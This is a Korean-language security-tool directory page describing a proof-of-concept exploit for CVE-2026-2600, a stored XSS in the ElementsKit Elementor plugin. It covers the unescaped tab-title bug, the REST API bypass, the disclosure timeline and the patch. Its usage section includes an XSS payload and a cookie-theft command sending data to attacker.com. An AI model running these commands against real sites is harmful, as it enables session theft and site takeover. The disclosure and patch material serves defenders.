Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-2600-POC — # CVE-2026-2600 PoC 익스플로잇 ElementsKit Elementor Addons <= 3.7.9의 저장형 XSS 취약점에 대한 개념 증명 익스플로잇으로, 인증된 Contributors가 조작된 Elementor 데이터를 통해 임의 스크립트를 주입할 수 있게 합니다. | Kitploit
도구/GitHubGitHub/folks-iwd/cve-2026-2600-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

# CVE-2026-2600 PoC 익스플로잇 ElementsKit Elementor Addons <= 3.7.9의 저장형 XSS 취약점에 대한 개념 증명 익스플로잇으로, 인증된 Contributors가 조작된 Elementor 데이터를 통해 임의 스크립트를 주입할 수 있게 합니다.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — 인증된(Contributor+) 저장형 교차 사이트 스크립팅(Stored Cross-Site Scripting)

CVSS6.4 MEDIUM
영향 범위<= 3.7.9
패치 버전3.8.0
최소 권한Contributor (edit_posts)
공격 벡터네트워크 / 낮은 복잡도 / 낮은 권한

버그

Simple Tab 위젯은 탭 제목을 echo된 HTML로 렌더링하지만 출력 이스케이프 처리가 없습니다. widgets/tab/tab.php에서 렌더링 루프는 다음과 같이 동작합니다:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

Elementor 편집기는 클라이언트 측에서 입력을 검증하지만, REST API 엔드포인트(/wp-json/wp/v2/posts/{id})는 _elementor_data 메타 필드를 직접 수락하여 해당 계층을 완전히 우회합니다.

인증된 Contributor는 ekit_tab_title을 임의의 HTML로 설정하는 조작된 Elementor JSON 페이로드로 게시물을 PATCH할 수 있습니다. 값이 _elementor_data에 그대로 저장되고 렌더링 시 esc_html() 없이 출력되므로, 페이지가 로드될 때 모든 방문자의 브라우저에서 스크립트가 실행됩니다.

영향

모든 Contributor는 다음을 수행할 수 있습니다:

  • 모든 사이트 방문자(관리자 포함)의 세션 쿠키 및 인증 토큰 탈취
  • 관리자 계정 탈취 및 전체 사이트 장악으로 권한 상승
  • 키로거 또는 자격 증명 수집 오버레이를 조용히 배포
  • 방문자를 피싱 페이지 또는 악성코드 유포 사이트로 리디렉션
  • 페이지를 지속적으로 변조 — 수동으로 제거할 때까지 페이로드 유지

공개 시점 기준 40만 개 이상의 활성 설치가 영향을 받았습니다.

사용법

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

이 스크립트는 HTTP로 인증하고, 관리자 편집기에서 REST nonce를 가져오며, 초안 게시물을 생성하고, ekit_tab_title 필드에 XSS 페이로드가 포함된 _elementor_data를 PATCH한 후 게시물을 게시합니다. 출력을 통해 페이로드가 페이지 소스에 활성화되어 있는지 확인할 수 있습니다.

root@kitploit:~
# 사용자 정의 페이로드
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# 콜백을 통한 쿠키 탈취
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# 대화형 콘솔 모드
python3 console_poc.py

전체 분석 문서

https://folks-iwd.github.io/writeups/cve-2026-2600.html

공개 타임라인

날짜이벤트
2026년 1월SVN diff 검토를 통해 발견. PoC 확인.
2026년 1월전체 분석 문서 및 PoC와 함께 Patchstack Alliance에 신고.
2026년 3월Wpmet이 v3.8.0에서 수정 사항 배포.
2026년 4월CVE-2026-2600 공개. CVSS 6.4 MEDIUM 지정.

패치

Wpmet은 widgets/tab/tab.php의 탭 제목 출력에 esc_html()을 추가했습니다:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
도구 다운로드